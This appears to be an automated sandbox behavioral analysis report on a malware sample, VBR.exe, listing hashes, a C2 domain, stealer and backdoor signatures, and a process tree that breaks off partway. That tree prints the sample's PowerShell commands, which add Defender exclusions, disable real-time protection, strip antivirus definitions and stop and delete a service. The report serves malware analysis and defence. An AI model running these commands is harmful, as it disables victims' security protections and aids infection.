Analysis
-
max time kernel
97s -
max time network
98s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
09-10-2024 19:27
Behavioral task
behavioral1
Sample
VBR.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
VBR.exe
Resource
win10v2004-20241007-en
General
-
Target
VBR.exe
-
Size
7.6MB
-
MD5
81711a07e09960fb3cff42a395a0d6da
-
SHA1
a0ee96f364149e8b49758773106916accd212f83
-
SHA256
ee67215d30e8b08d54518f88ecdb0fdbb7f2791960c0021f799d122c745608e7
-
SHA512
f68faef3d59878c52011c77ad7e66c5e7bae5ce3c435635bacd78c1f8efea682fec688f2676d55130e268dbc3a4261c518029dbae36527e356507d3636869cc1
-
SSDEEP
196608:Hyd0cDeQLjv+bhqNVoBKUh8mz4Iv9Pfu1D7c:9ieAL+9qz8/b4INuRc
Malware Config
Extracted
bdaejec
ddos.dnsnb8.net
Signatures
-
Detects Bdaejec Backdoor. 1 IoCs
Bdaejec is backdoor written in C++.
resource yara_rule behavioral2/memory/3980-246-0x00000000001D0000-0x00000000001D9000-memory.dmp family_bdaejec_backdoor -
pid Process 3316 powershell.exe 3228 powershell.exe 4520 powershell.exe 2176 powershell.exe 4780 powershell.exe -
resource yara_rule behavioral2/files/0x000e000000023b6c-106.dat aspack_v212_v242 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation WuZkxmLb.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 788 cmd.exe 2496 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 3520 bound.exe 3980 WuZkxmLb.exe 4948 rar.exe -
Loads dropped DLL 18 IoCs
pid Process 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 4796 VBR.exe 3520 bound.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 26 discord.com 27 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 24 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 3 IoCs
pid Process 1064 tasklist.exe 4204 tasklist.exe 3080 tasklist.exe -
resource yara_rule behavioral2/files/0x0007000000023ca3-22.dat upx behavioral2/memory/4796-26-0x00007FF8CE3C0000-0x00007FF8CE9A9000-memory.dmp upx behavioral2/files/0x0007000000023c95-28.dat upx behavioral2/files/0x0007000000023ca1-30.dat upx behavioral2/files/0x0007000000023ca2-35.dat upx behavioral2/files/0x0007000000023c9c-48.dat upx behavioral2/memory/4796-50-0x00007FF8E71E0000-0x00007FF8E71EF000-memory.dmp upx behavioral2/memory/4796-49-0x00007FF8E27F0000-0x00007FF8E2813000-memory.dmp upx behavioral2/files/0x0007000000023c9b-47.dat upx behavioral2/files/0x0007000000023c9a-46.dat upx behavioral2/files/0x0007000000023c99-45.dat upx behavioral2/files/0x0007000000023c98-44.dat upx behavioral2/files/0x0007000000023c97-43.dat upx behavioral2/files/0x0007000000023c96-42.dat upx behavioral2/files/0x0007000000023c94-41.dat upx behavioral2/files/0x0007000000023ca8-40.dat upx behavioral2/files/0x0007000000023ca7-39.dat upx behavioral2/files/0x0007000000023ca6-38.dat upx behavioral2/files/0x0007000000023ca0-34.dat upx behavioral2/memory/4796-56-0x00007FF8DD480000-0x00007FF8DD4AD000-memory.dmp upx behavioral2/memory/4796-58-0x00007FF8E3690000-0x00007FF8E36A9000-memory.dmp upx behavioral2/memory/4796-60-0x00007FF8DD450000-0x00007FF8DD473000-memory.dmp upx behavioral2/memory/4796-62-0x00007FF8CE0A0000-0x00007FF8CE217000-memory.dmp upx behavioral2/memory/4796-64-0x00007FF8E27D0000-0x00007FF8E27E9000-memory.dmp upx behavioral2/memory/4796-69-0x00007FF8DD410000-0x00007FF8DD443000-memory.dmp upx behavioral2/memory/4796-68-0x00007FF8E3A50000-0x00007FF8E3A5D000-memory.dmp upx behavioral2/memory/4796-67-0x00007FF8CE3C0000-0x00007FF8CE9A9000-memory.dmp upx behavioral2/memory/4796-72-0x00007FF8DCE90000-0x00007FF8DCF5D000-memory.dmp upx behavioral2/memory/4796-71-0x00007FF8E27F0000-0x00007FF8E2813000-memory.dmp upx behavioral2/memory/4796-75-0x00007FF8CDB70000-0x00007FF8CE092000-memory.dmp upx behavioral2/memory/4796-79-0x00007FF8E1000000-0x00007FF8E1014000-memory.dmp upx behavioral2/memory/4796-81-0x00007FF8E3690000-0x00007FF8E36A9000-memory.dmp upx behavioral2/memory/4796-82-0x00007FF8E2AE0000-0x00007FF8E2AED000-memory.dmp upx behavioral2/memory/4796-78-0x00007FF8DD480000-0x00007FF8DD4AD000-memory.dmp upx behavioral2/memory/4796-85-0x00007FF8DD450000-0x00007FF8DD473000-memory.dmp upx behavioral2/memory/4796-86-0x00007FF8CD650000-0x00007FF8CD76C000-memory.dmp upx behavioral2/memory/4796-89-0x00007FF8CE0A0000-0x00007FF8CE217000-memory.dmp upx behavioral2/memory/4796-107-0x00007FF8E27D0000-0x00007FF8E27E9000-memory.dmp upx behavioral2/memory/4796-221-0x00007FF8DD410000-0x00007FF8DD443000-memory.dmp upx behavioral2/memory/4796-254-0x00007FF8DCE90000-0x00007FF8DCF5D000-memory.dmp upx behavioral2/memory/4796-261-0x00007FF8CDB70000-0x00007FF8CE092000-memory.dmp upx behavioral2/memory/4796-278-0x00007FF8CE3C0000-0x00007FF8CE9A9000-memory.dmp upx behavioral2/memory/4796-279-0x00007FF8E27F0000-0x00007FF8E2813000-memory.dmp upx behavioral2/memory/4796-297-0x00007FF8CE0A0000-0x00007FF8CE217000-memory.dmp upx behavioral2/memory/4796-358-0x00007FF8E27F0000-0x00007FF8E2813000-memory.dmp upx behavioral2/memory/4796-357-0x00007FF8CE3C0000-0x00007FF8CE9A9000-memory.dmp upx behavioral2/memory/4796-376-0x00007FF8E3690000-0x00007FF8E36A9000-memory.dmp upx behavioral2/memory/4796-372-0x00007FF8CE3C0000-0x00007FF8CE9A9000-memory.dmp upx behavioral2/memory/4796-386-0x00007FF8CD650000-0x00007FF8CD76C000-memory.dmp upx behavioral2/memory/4796-392-0x00007FF8DCE90000-0x00007FF8DCF5D000-memory.dmp upx behavioral2/memory/4796-391-0x00007FF8E3A50000-0x00007FF8E3A5D000-memory.dmp upx behavioral2/memory/4796-390-0x00007FF8E27D0000-0x00007FF8E27E9000-memory.dmp upx behavioral2/memory/4796-389-0x00007FF8CE0A0000-0x00007FF8CE217000-memory.dmp upx behavioral2/memory/4796-388-0x00007FF8DD450000-0x00007FF8DD473000-memory.dmp upx behavioral2/memory/4796-387-0x00007FF8DD410000-0x00007FF8DD443000-memory.dmp upx behavioral2/memory/4796-383-0x00007FF8CDB70000-0x00007FF8CE092000-memory.dmp upx behavioral2/memory/4796-385-0x00007FF8E2AE0000-0x00007FF8E2AED000-memory.dmp upx behavioral2/memory/4796-384-0x00007FF8E1000000-0x00007FF8E1014000-memory.dmp upx behavioral2/memory/4796-375-0x00007FF8DD480000-0x00007FF8DD4AD000-memory.dmp upx behavioral2/memory/4796-374-0x00007FF8E71E0000-0x00007FF8E71EF000-memory.dmp upx behavioral2/memory/4796-373-0x00007FF8E27F0000-0x00007FF8E2813000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\DW\DWTRIG20.EXE WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSOSYNC.EXE WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msotd.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SELFCERT.EXE WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsgen.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\jp2launcher.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_48.49.31001.0_x64__8wekyb3d8bbwe\XboxApp.exe WuZkxmLb.exe File opened for modification C:\Program Files\WriteApprove.exe WuZkxmLb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\javap.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\filecompare.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\SpeechToTextOverlay64-Retail.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office 15\ClientX64\IntegratedOffice.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exe WuZkxmLb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe WuZkxmLb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdateComRegisterShell64.exe WuZkxmLb.exe File opened for modification C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ONENOTEM.EXE WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PerfBoost.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaws.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\klist.exe WuZkxmLb.exe File opened for modification C:\Program Files\Mozilla Firefox\crashreporter.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\idlj.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\keytool.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\kinit.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Video.UI.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\ssvagent.exe WuZkxmLb.exe File opened for modification C:\Program Files (x86)\Windows Mail\wab.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jinfo.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\unpack200.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\java-rmi.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\javaw.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\java-rmi.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PDFREFLOW.EXE WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\klist.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\serialver.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\WhatsNew.Store.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2018.826.98.0_x64__8wekyb3d8bbwe\WindowsCamera.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\MSOHTMED.EXE WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\ssvagent.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jre-1.8\bin\ktab.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.30251.0_x64__8wekyb3d8bbwe\AppInstallerPythonRedirector.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_2019.19071.12548.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jstatd.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\tnameserv.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.NetFX45.exe WuZkxmLb.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.371\GoogleUpdate.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\wsimport.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.1903.1152.0_x64__8wekyb3d8bbwe\LocalBridge.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_14.53.77.0_x64__kzf8qxf38zg5c\SkypeApp.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\msoev.exe WuZkxmLb.exe File opened for modification C:\Program Files\Mozilla Firefox\updater.exe WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\3DViewer.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\bin\jconsole.exe WuZkxmLb.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\rmid.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\AppVDllSurrogate32.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE WuZkxmLb.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ORGCHART.EXE WuZkxmLb.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\MSOXMLED.EXE WuZkxmLb.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe WuZkxmLb.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2444 sc.exe 4372 sc.exe 4420 sc.exe 2104 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bound.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WuZkxmLb.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 2908 cmd.exe 4472 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2776 WMIC.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 3376 systeminfo.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2176 powershell.exe 4780 powershell.exe 3316 powershell.exe 3316 powershell.exe 2176 powershell.exe 2176 powershell.exe 4780 powershell.exe 4780 powershell.exe 3316 powershell.exe 3316 powershell.exe 2496 powershell.exe 2496 powershell.exe 2496 powershell.exe 5012 powershell.exe 5012 powershell.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 5012 powershell.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe 3520 bound.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2176 powershell.exe Token: SeDebugPrivilege 4780 powershell.exe Token: SeDebugPrivilege 3316 powershell.exe Token: SeDebugPrivilege 4204 tasklist.exe Token: SeDebugPrivilege 1064 tasklist.exe Token: SeIncreaseQuotaPrivilege 540 WMIC.exe Token: SeSecurityPrivilege 540 WMIC.exe Token: SeTakeOwnershipPrivilege 540 WMIC.exe Token: SeLoadDriverPrivilege 540 WMIC.exe Token: SeSystemProfilePrivilege 540 WMIC.exe Token: SeSystemtimePrivilege 540 WMIC.exe Token: SeProfSingleProcessPrivilege 540 WMIC.exe Token: SeIncBasePriorityPrivilege 540 WMIC.exe Token: SeCreatePagefilePrivilege 540 WMIC.exe Token: SeBackupPrivilege 540 WMIC.exe Token: SeRestorePrivilege 540 WMIC.exe Token: SeShutdownPrivilege 540 WMIC.exe Token: SeDebugPrivilege 540 WMIC.exe Token: SeSystemEnvironmentPrivilege 540 WMIC.exe Token: SeRemoteShutdownPrivilege 540 WMIC.exe Token: SeUndockPrivilege 540 WMIC.exe Token: SeManageVolumePrivilege 540 WMIC.exe Token: 33 540 WMIC.exe Token: 34 540 WMIC.exe Token: 35 540 WMIC.exe Token: 36 540 WMIC.exe Token: SeDebugPrivilege 2496 powershell.exe Token: SeIncreaseQuotaPrivilege 540 WMIC.exe Token: SeSecurityPrivilege 540 WMIC.exe Token: SeTakeOwnershipPrivilege 540 WMIC.exe Token: SeLoadDriverPrivilege 540 WMIC.exe Token: SeSystemProfilePrivilege 540 WMIC.exe Token: SeSystemtimePrivilege 540 WMIC.exe Token: SeProfSingleProcessPrivilege 540 WMIC.exe Token: SeIncBasePriorityPrivilege 540 WMIC.exe Token: SeCreatePagefilePrivilege 540 WMIC.exe Token: SeBackupPrivilege 540 WMIC.exe Token: SeRestorePrivilege 540 WMIC.exe Token: SeShutdownPrivilege 540 WMIC.exe Token: SeDebugPrivilege 540 WMIC.exe Token: SeSystemEnvironmentPrivilege 540 WMIC.exe Token: SeRemoteShutdownPrivilege 540 WMIC.exe Token: SeUndockPrivilege 540 WMIC.exe Token: SeManageVolumePrivilege 540 WMIC.exe Token: 33 540 WMIC.exe Token: 34 540 WMIC.exe Token: 35 540 WMIC.exe Token: 36 540 WMIC.exe Token: SeDebugPrivilege 3080 tasklist.exe Token: SeDebugPrivilege 5012 powershell.exe Token: SeDebugPrivilege 3228 powershell.exe Token: SeDebugPrivilege 440 powershell.exe Token: SeIncreaseQuotaPrivilege 3612 WMIC.exe Token: SeSecurityPrivilege 3612 WMIC.exe Token: SeTakeOwnershipPrivilege 3612 WMIC.exe Token: SeLoadDriverPrivilege 3612 WMIC.exe Token: SeSystemProfilePrivilege 3612 WMIC.exe Token: SeSystemtimePrivilege 3612 WMIC.exe Token: SeProfSingleProcessPrivilege 3612 WMIC.exe Token: SeIncBasePriorityPrivilege 3612 WMIC.exe Token: SeCreatePagefilePrivilege 3612 WMIC.exe Token: SeBackupPrivilege 3612 WMIC.exe Token: SeRestorePrivilege 3612 WMIC.exe Token: SeShutdownPrivilege 3612 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2400 wrote to memory of 4796 2400 VBR.exe 83 PID 2400 wrote to memory of 4796 2400 VBR.exe 83 PID 4796 wrote to memory of 4648 4796 VBR.exe 88 PID 4796 wrote to memory of 4648 4796 VBR.exe 88 PID 4796 wrote to memory of 3020 4796 VBR.exe 89 PID 4796 wrote to memory of 3020 4796 VBR.exe 89 PID 4796 wrote to memory of 3428 4796 VBR.exe 90 PID 4796 wrote to memory of 3428 4796 VBR.exe 90 PID 4796 wrote to memory of 1164 4796 VBR.exe 91 PID 4796 wrote to memory of 1164 4796 VBR.exe 91 PID 3020 wrote to memory of 3316 3020 cmd.exe 96 PID 3020 wrote to memory of 3316 3020 cmd.exe 96 PID 3428 wrote to memory of 2176 3428 cmd.exe 97 PID 3428 wrote to memory of 2176 3428 cmd.exe 97 PID 4648 wrote to memory of 4780 4648 cmd.exe 99 PID 4648 wrote to memory of 4780 4648 cmd.exe 99 PID 1164 wrote to memory of 3520 1164 cmd.exe 98 PID 1164 wrote to memory of 3520 1164 cmd.exe 98 PID 1164 wrote to memory of 3520 1164 cmd.exe 98 PID 4796 wrote to memory of 472 4796 VBR.exe 101 PID 4796 wrote to memory of 472 4796 VBR.exe 101 PID 4796 wrote to memory of 2472 4796 VBR.exe 102 PID 4796 wrote to memory of 2472 4796 VBR.exe 102 PID 3520 wrote to memory of 3980 3520 bound.exe 105 PID 3520 wrote to memory of 3980 3520 bound.exe 105 PID 3520 wrote to memory of 3980 3520 bound.exe 105 PID 3520 wrote to memory of 2276 3520 bound.exe 106 PID 3520 wrote to memory of 2276 3520 bound.exe 106 PID 3520 wrote to memory of 2276 3520 bound.exe 106 PID 2276 wrote to memory of 4372 2276 cmd.exe 107 PID 2276 wrote to memory of 4372 2276 cmd.exe 107 PID 2276 wrote to memory of 4372 2276 cmd.exe 107 PID 472 wrote to memory of 1064 472 cmd.exe 108 PID 472 wrote to memory of 1064 472 cmd.exe 108 PID 2472 wrote to memory of 4204 2472 cmd.exe 109 PID 2472 wrote to memory of 4204 2472 cmd.exe 109 PID 3520 wrote to memory of 1056 3520 bound.exe 110 PID 3520 wrote to memory of 1056 3520 bound.exe 110 PID 3520 wrote to memory of 1056 3520 bound.exe 110 PID 4796 wrote to memory of 4732 4796 VBR.exe 146 PID 4796 wrote to memory of 4732 4796 VBR.exe 146 PID 4796 wrote to memory of 788 4796 VBR.exe 113 PID 4796 wrote to memory of 788 4796 VBR.exe 113 PID 4796 wrote to memory of 4008 4796 VBR.exe 114 PID 4796 wrote to memory of 4008 4796 VBR.exe 114 PID 4796 wrote to memory of 4456 4796 VBR.exe 115 PID 4796 wrote to memory of 4456 4796 VBR.exe 115 PID 4796 wrote to memory of 2908 4796 VBR.exe 119 PID 4796 wrote to memory of 2908 4796 VBR.exe 119 PID 4796 wrote to memory of 1976 4796 VBR.exe 121 PID 4796 wrote to memory of 1976 4796 VBR.exe 121 PID 4796 wrote to memory of 2068 4796 VBR.exe 123 PID 4796 wrote to memory of 2068 4796 VBR.exe 123 PID 1056 wrote to memory of 4420 1056 cmd.exe 126 PID 1056 wrote to memory of 4420 1056 cmd.exe 126 PID 1056 wrote to memory of 4420 1056 cmd.exe 126 PID 788 wrote to memory of 2496 788 cmd.exe 127 PID 788 wrote to memory of 2496 788 cmd.exe 127 PID 4732 wrote to memory of 540 4732 cmd.exe 128 PID 4732 wrote to memory of 540 4732 cmd.exe 128 PID 3520 wrote to memory of 4000 3520 bound.exe 129 PID 3520 wrote to memory of 4000 3520 bound.exe 129 PID 3520 wrote to memory of 4000 3520 bound.exe 129 PID 2068 wrote to memory of 5012 2068 cmd.exe 130
Processes
-
C:\Users\Admin\AppData\Local\Temp\VBR.exe"C:\Users\Admin\AppData\Local\Temp\VBR.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Users\Admin\AppData\Local\Temp\VBR.exe"C:\Users\Admin\AppData\Local\Temp\VBR.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\VBR.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:4648 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\VBR.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4780
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:3020 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:3428 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2176
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:1164 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3520 -
C:\Users\Admin\AppData\Local\Temp\WuZkxmLb.exeC:\Users\Admin\AppData\Local\Temp\WuZkxmLb.exe5⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3980 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2c703a6a.bat" "6⤵
- System Location Discovery: System Language Discovery
PID:1848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop FairplayKD >nul5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\sc.exesc stop FairplayKD6⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4372
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete FairplayKD >nul5⤵
